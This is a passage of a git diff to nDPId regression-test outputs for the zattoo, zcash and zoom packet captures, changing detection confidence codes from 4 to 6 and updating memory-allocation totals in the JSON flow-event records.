+00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614851148233,"flow_last_seen":1614851148234,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1614851148234,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zattoo","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zattoo.com","ja3":"64bb849b426bd19378dcd61a6396fef1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01364{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1614851148233,"flow_last_seen":1614851148235,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1072,"flow_tot_l4_payload_len":1185,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1614851148235,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zattoo","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"zattoo.com","ja3":"64bb849b426bd19378dcd61a6396fef1","ja3s":"5ea8fd3044cb27a1d12e476d60e0668c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Jose, O=Spirent Communications Inc., OU=IT, CN=www.spirent.com","subjectDN":"C=US, ST=California, L=San Jose, O=zattoo.com, OU=Marketing, CN=zattoo.com","fingerprint":"A8:F3:C0:1B:32:F1:73:F3:11:90:A0:01:3E:1B:3E:D5:0C:00:EB:D2"}} 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614851148248,"flow_last_seen":1614851148248,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614851148248,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614851148248,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614851148248,"pkt":"5kBKB+riApXG95NLCABFAAAw4b4AAIAGAAAKZQACCmYAAgt4AFAk9NudAAAAAHACgAEU8QAAAgQFtAMDAQA="} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614851148248,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614851148248,"pkt":"ApXG95NL5kBKB+riCABFAAAw4bcAAH8GRUIKZgACCmUAAgBQC3gk9N+yJPTbnnASgAHePQAAAgQFtAMDAQA="} 
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614851148248,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614851148248,"pkt":"5kBKB+riApXG95NLCABFAAAo4b8AAIAGAAAKZQACCmYAAgt4AFAk9NueJPTfs1AQgAEU6QAAAAAAAAAA"} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614851148248,"flow_last_seen":1614851148248,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":401,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1614851148248,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Zattoo","breed":"Fun","category":"Video"},"http": {"hostname":"zattosecurehd2-f.akamaihd.net","url":"zattosecurehd2-f.akamaihd.net\/crossdomain.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.6; rv:6.0) Gecko\/20100101 Firefox\/6.0"}} -00911{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1614851148233,"flow_last_seen":1614851148238,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1165,"flow_tot_l4_payload_len":3626,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1614851148254,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS 
Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zattoo","breed":"Fun","category":"Video"}} -00671{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1614851148248,"flow_last_seen":1614851148254,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":961,"flow_tot_l4_payload_len":8045,"flow_avg_l4_payload_len":383,"midstream":0,"thread_ts_msec":1614851148254,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Zattoo","breed":"Fun","category":"Video"}} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614851148248,"flow_last_seen":1614851148248,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":401,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1614851148248,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Zattoo","breed":"Fun","category":"Video"},"http": {"hostname":"zattosecurehd2-f.akamaihd.net","url":"zattosecurehd2-f.akamaihd.net\/crossdomain.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.6; rv:6.0) Gecko\/20100101 Firefox\/6.0"}} 
+00911{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1614851148233,"flow_last_seen":1614851148238,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1165,"flow_tot_l4_payload_len":3626,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1614851148254,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zattoo","breed":"Fun","category":"Video"}} +00671{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1614851148248,"flow_last_seen":1614851148254,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":961,"flow_tot_l4_payload_len":8045,"flow_avg_l4_payload_len":383,"midstream":0,"thread_ts_msec":1614851148254,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Zattoo","breed":"Fun","category":"Video"}} 
00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":32,"source":"zattoo.pcap","alias":"nDPId-test","packets-captured":32,"packets-processed":32,"total-skipped-flows":0,"total-l4-payload-len":11671,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":16,"global_ts_msec":1614851148254} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 32/32 @@ -22,9 +22,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5873862 bytes -~~ total memory freed........: 5873862 bytes -~~ total allocations/frees...: 118159/118159 +~~ total memory allocated....: 6007496 bytes +~~ total memory freed........: 6007496 bytes +~~ total allocations/frees...: 120921/120921 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 1369 chars diff --git a/test/results/zcash.pcap.out b/test/results/zcash.pcap.out index 4daecaeb3..312d8d3a3 100644 --- a/test/results/zcash.pcap.out +++ b/test/results/zcash.pcap.out 
@@ -4,9 +4,9 @@ 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1514196094240,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196094240,"pkt":"fmgbW\/gUcIXCQA64CABFAAA8ux1AAEAGRaDAqAJcsiDE2deWI1qAnf85AAAAAKACchAV6gAAAgQFtAQCCApPjruwAAAAAAEDAwc="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1514196094322,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196094322,"pkt":"cIXCQA64fmgbW\/gUCABFAAA8AABAADMGDb6yIMTZwKgCXCNa15Yj5r0mgJ3\/OqAScSDZNwAAAgQFtAQCCArshW\/8T467sAEDAwk="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1514196094322,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1514196094322,"pkt":"fmgbW\/gUcIXCQA64CABFAAA0ux5AAEAGRafAqAJcsiDE2deWI1qAnf86I+a9J4AQAOV4LAAAAQEICk+Ou8XshW\/8"} 
-00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196094240,"flow_last_seen":1514196094322,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1514196094322,"l3_proto":"ip4","src_ip":"192.168.2.92","dst_ip":"178.32.196.217","src_port":55190,"dst_port":9050,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196094240,"flow_last_seen":1514196094322,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1514196094322,"l3_proto":"ip4","src_ip":"192.168.2.92","dst_ip":"178.32.196.217","src_port":55190,"dst_port":9050,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":88,"source":"zcash.pcap","alias":"nDPId-test","packets-captured":88,"packets-processed":87,"total-skipped-flows":0,"total-l4-payload-len":6805,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1514196730496} -00917{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":145,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":145,"flow_first_seen":1514196094240,"flow_last_seen":1514197248783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":11022,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1514197248783,"l3_proto":"ip4","src_ip":"192.168.2.92","dst_ip":"178.32.196.217","src_port":55190,"dst_port":9050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00917{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":145,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":145,"flow_first_seen":1514196094240,"flow_last_seen":1514197248783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":11022,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1514197248783,"l3_proto":"ip4","src_ip":"192.168.2.92","dst_ip":"178.32.196.217","src_port":55190,"dst_port":9050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":145,"source":"zcash.pcap","alias":"nDPId-test","packets-captured":145,"packets-processed":145,"total-skipped-flows":0,"total-l4-payload-len":11022,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1514197248783} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 145/145 
@@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5883904 bytes -~~ total memory freed........: 5883904 bytes -~~ total allocations/frees...: 118262/118262 +~~ total memory allocated....: 6017538 bytes +~~ total memory freed........: 6017538 bytes +~~ total allocations/frees...: 121024/121024 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 922 chars diff --git a/test/results/zoom.pcap.out b/test/results/zoom.pcap.out index 744d0a064..22b767c94 100644 --- a/test/results/zoom.pcap.out +++ b/test/results/zoom.pcap.out 
@@ -2,66 +2,66 @@ 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"zoom.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1569520466080} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466080,"flow_last_seen":1569520466080,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1569520466080,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"172.217.21.72","src_port":54854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00735{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569520466080,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"thread_ts_msec":1569520466080,"pkt":"EBMx8Tl2KDc3AG3ICABFAAD7AABAAEAGtb7AqAF1rNkVSNZGAbt9MLg2pduNV4AYEAjbcQAAAQEICiWcznNwmChtFgMBAMIBAAC+AwE5BEH329R9hgOe6JDNh5Do5\/IyBg\/qLeMPj9mOGNz+swAAEgAvADMANQA5wAnACsATwBRWAAEAAIP\/AQABAAAAAB0AGwAAGHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbQAXAAAABQAFAQAAAAAzdAAAABIAAAAQADAALgJoMgVoMi0xNgVoMi0xNQVoMi0xNAhzcGR5LzMuMQZzcGR5LzMIaHR0cC8xLjEACwACAQAACgAKAAgAHQAXABgAGQ=="} 
-01028{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466080,"flow_last_seen":1569520466080,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1569520466080,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"172.217.21.72","src_port":54854,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.googletagmanager.com","ja3":"d78489b860c8bf7838a6ff0b4d131541","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01028{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466080,"flow_last_seen":1569520466080,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1569520466080,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"172.217.21.72","src_port":54854,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1","client_requested_server_name":"www.googletagmanager.com","ja3":"d78489b860c8bf7838a6ff0b4d131541","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"zoom.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466209,"flow_last_seen":1569520466209,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1569520466209,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zoom.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1569520466209,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1569520466209,"pkt":"AQBeAAD7KDc3AG3ICABFAABJ4i8AAAERNFzAqAF14AAA+xTpFOkANQtaAAAAAAABAAAAAAAAEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAAADAAB"} -00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"zoom.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466209,"flow_last_seen":1569520466209,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1569520466209,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": 
{"answer":"_spotify-connect._tcp.local"}} +00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"zoom.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466209,"flow_last_seen":1569520466209,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1569520466209,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466316,"flow_last_seen":1569520466316,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520466316,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569520466316,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520466316,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+ZLAqAF1p2PXpNZPEVI+PYNCAAAAALAC\/\/9XugAAAgQFtAEDAwUBAQgKJZzPXwAAAAAEAgAA"} 
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1569520466355,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520466355,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADUGBJenY9ekwKgBdRFS1k9+iDZRPj2DQ6AScSDtKQAAAgQFrAQCCArh63OkJZzPXwEDAwc="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1569520466355,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520466355,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+Z7AqAF1p2PXpNZPEVI+PYNDfog2UoAQECx8vAAAAQEICiWcz4Xh63Ok"} -01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520466316,"flow_last_seen":1569520466355,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520466355,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": 
